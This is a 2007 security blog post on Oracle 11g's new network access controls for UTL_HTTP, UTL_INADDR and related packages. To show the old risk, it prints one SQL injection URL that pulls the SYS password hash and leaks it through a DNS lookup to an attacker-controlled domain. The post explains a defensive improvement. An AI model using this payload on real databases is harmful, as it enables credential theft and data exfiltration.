David Litchfield's Weblog

Home
Archives
NGSSoftware
DatabaseSecurity.com


Greymatter Forums

November 2007
SMTWTFS
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30  

Valid XHTML 1.0!

Powered By Greymatter

RSS 1.0 FEED
RSS 2.0 FEED
Atom 0.3 FEED
Powered by gm-rss 2.0.1
Home » Archives » November 2007 » Another set of 11g Security Improvements

[Previous entry: "Burp Sequencer and the Web Application Hacker's Handbook"] [Next entry: "11g UTL_HTTP update"]

11/02/2007: "Another set of 11g Security Improvements"


Previous versions of Oracle came with a ready made set of networking PL/SQL packages namely: UTL_TCP, UTL_HTTP, UTL_SMTP, UTL_MAIL and UTL_INADDR. PUBLIC had the execute permission on these packages and this posed a security risk. For example, in a SQL injection attack via a web server, an attacker could exfiltrate data out of the network over UDP port 53 masquerading as DNS queries. This is accomplished by injecting UTL_INADDR.GET_HOST_ADDRESS into the vector:

http://www.example.com/foo.jsp?p_vector=bar'||UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = 'SYS')||'.ngssoftware.com')--

Here, the password for the SYS user ("D3AAEDA7EDA1B4AB") is selected from DBA_USERS and prefixed to ".ngssoftware.com" and then passed as the hostname to lookup using UTL_INADDR. This causes the database server to issue a DNS query to D3AAEDA7EDA1B4AB.ngssoftware.com. Now, as long as the attacker controls the ngssoftware.com domain name server he eventually gets the DNS query and thus the data he's interested in. Another attack involves exfiltrating data using UTL_HTTP.REQUEST over the web.

Anyway, long story short, before people can use these network utilities now they need speciall permissions that are granted via a new package called DBMS_NETWORK_ACL_ADMIN using the CREATE_ACL procedure. To use UTL_TCP, UTL_HTTP, UTL_MAIL and UTL_SMTP they need to be issued the "connect" privilege and the "resolve" privilege to use "UTL_INADDR".

Unfortunately, I'm at the airport right now and away from my 11g box and so can't test this but I'm wondering if you have the "connect" privilege on say "UTL_HTTP" whether you also need the "resolve" privilege to be able to lookup the remote host. If you don't, then it seems a bit redundant requiring "resolve" on UTL_INADDR because you can still essentially indirectly resolve via UTL_HTTP.

Anyway, all of this is another good security enhancement to 11g. The more I look the more I'm liking it.